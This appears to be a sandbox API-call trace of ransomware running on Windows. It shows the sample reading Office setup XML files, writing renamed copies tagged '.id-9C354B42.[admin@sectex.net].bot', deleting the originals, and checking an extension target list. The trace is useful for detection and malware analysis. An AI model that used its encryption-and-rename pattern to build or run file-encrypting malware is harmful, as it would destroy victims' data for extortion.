	[0038.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.290] lstrlenW (lpString=".dbf") returned 4
	[0038.290] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.290] lstrlenW (lpString=".1cd") returned 4
	[0038.290] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.290] lstrlenW (lpString=".jpg") returned 4
	[0038.290] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.290] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.290] lstrlenW (lpString="SETUP.XML") returned 9
	[0038.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.704] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1886) returned 1
	[0039.704] CloseHandle (hObject=0x1b0) returned 1
	[0039.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20
	[0039.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.704] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.704] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.705] GetLastError () returned 0x0
	[0039.705] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x75e, lpOverlapped=0x0) returned 1
	[0039.708] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x760, lpOverlapped=0x0) returned 1
	[0039.710] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.710] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.710] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.710] CloseHandle (hObject=0x1c0) returned 1
	[0039.711] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.711] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.712] CloseHandle (hObject=0x1b0) returned 1
	[0039.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.712] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1
	[0039.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.712] lstrlenW (lpString=".doc") returned 4
	[0039.713] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString=".docx") returned 5
	[0039.713] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.713] lstrlenW (lpString=".pdf") returned 4
	[0039.713] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString=".xls") returned 4
	[0039.713] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString=".xlsx") returned 5
	[0039.713] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.713] lstrlenW (lpString=".ppt") returned 4
	[0039.713] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString=".zip") returned 4
	[0039.713] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.713] lstrlenW (lpString=".rar") returned 4
	[0039.713] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString=".bz2") returned 4
	[0039.713] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString=".7z") returned 3
	[0039.713] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString=".dbf") returned 4
	[0039.713] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString=".1cd") returned 4
	[0039.713] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString=".jpg") returned 4
	[0039.713] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.713] lstrlenW (lpString=".doc") returned 4
	[0039.713] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString=".docx") returned 5
	[0039.714] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.714] lstrlenW (lpString=".pdf") returned 4
	[0039.714] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString=".xls") returned 4
	[0039.714] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString=".xlsx") returned 5
	[0039.714] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.714] lstrlenW (lpString=".ppt") returned 4
	[0039.714] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.714] lstrlenW (lpString=".zip") returned 4
	[0039.714] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.714] lstrlenW (lpString=".rar") returned 4
	[0039.714] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString=".bz2") returned 4
	[0039.714] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString=".7z") returned 3
	[0039.714] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.714] lstrlenW (lpString=".dbf") returned 4
	[0039.714] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.714] lstrlenW (lpString=".1cd") returned 4
	[0039.714] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106
	[0039.714] lstrlenW (lpString=".jpg") returned 4
	[0039.714] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.714] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.714] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.715] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=6241) returned 1
	[0039.715] CloseHandle (hObject=0x1b0) returned 1
	[0039.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20
	[0039.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.716] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.716] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.716] GetLastError () returned 0x0
	[0039.716] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1861, lpOverlapped=0x0) returned 1
	[0039.718] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1870, lpOverlapped=0x0) returned 1
	[0039.718] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.719] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.719] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.719] CloseHandle (hObject=0x1c0) returned 1
	[0039.719] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.719] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.720] CloseHandle (hObject=0x1b0) returned 1
	[0039.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.720] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1
	[0039.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.721] lstrlenW (lpString=".doc") returned 4
	[0039.721] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString=".docx") returned 5
	[0039.721] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.721] lstrlenW (lpString=".pdf") returned 4
	[0039.721] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString=".xls") returned 4
	[0039.721] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString=".xlsx") returned 5
	[0039.721] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.721] lstrlenW (lpString=".ppt") returned 4
	[0039.721] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.721] lstrlenW (lpString=".zip") returned 4
	[0039.721] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.721] lstrlenW (lpString=".rar") returned 4
	[0039.721] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString=".bz2") returned 4
	[0039.721] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString=".7z") returned 3
	[0039.721] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.721] lstrlenW (lpString=".dbf") returned 4
	[0039.721] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.721] lstrlenW (lpString=".1cd") returned 4
	[0039.721] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".jpg") returned 4
	[0039.722] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".doc") returned 4
	[0039.722] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString=".docx") returned 5
	[0039.722] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.722] lstrlenW (lpString=".pdf") returned 4
	[0039.722] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString=".xls") returned 4
	[0039.722] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString=".xlsx") returned 5
	[0039.722] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.722] lstrlenW (lpString=".ppt") returned 4
	[0039.722] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".zip") returned 4
	[0039.722] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.722] lstrlenW (lpString=".rar") returned 4
	[0039.722] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString=".bz2") returned 4
	[0039.722] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString=".7z") returned 3
	[0039.722] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".dbf") returned 4
	[0039.722] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".1cd") returned 4
	[0039.722] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101
	[0039.722] lstrlenW (lpString=".jpg") returned 4
	[0039.723] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.723] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.723] lstrlenW (lpString="VisioMUI.XML") returned 12
	[0039.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.724] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=9503) returned 1
	[0039.724] CloseHandle (hObject=0x1b0) returned 1
	[0039.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20
	[0039.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.724] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.724] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.726] GetLastError () returned 0x0
	[0039.726] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x251f, lpOverlapped=0x0) returned 1
	[0039.727] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2520, lpOverlapped=0x0) returned 1
	[0039.728] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.728] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0039.728] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.729] CloseHandle (hObject=0x1c0) returned 1
	[0039.729] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.729] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.730] CloseHandle (hObject=0x1b0) returned 1
	[0039.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.730] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1
	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString=".doc") returned 4
	[0039.731] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString=".docx") returned 5
	[0039.731] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.731] lstrlenW (lpString=".pdf") returned 4
	[0039.731] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString=".xls") returned 4
	[0039.731] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString=".xlsx") returned 5
	[0039.731] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.731] lstrlenW (lpString=".ppt") returned 4
	[0039.731] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString=".zip") returned 4
	[0039.731] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.731] lstrlenW (lpString=".rar") returned 4
	[0039.731] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString=".bz2") returned 4
	[0039.731] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString=".7z") returned 3
	[0039.731] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString=".dbf") returned 4
	[0039.731] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString=".1cd") returned 4
	[0039.731] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
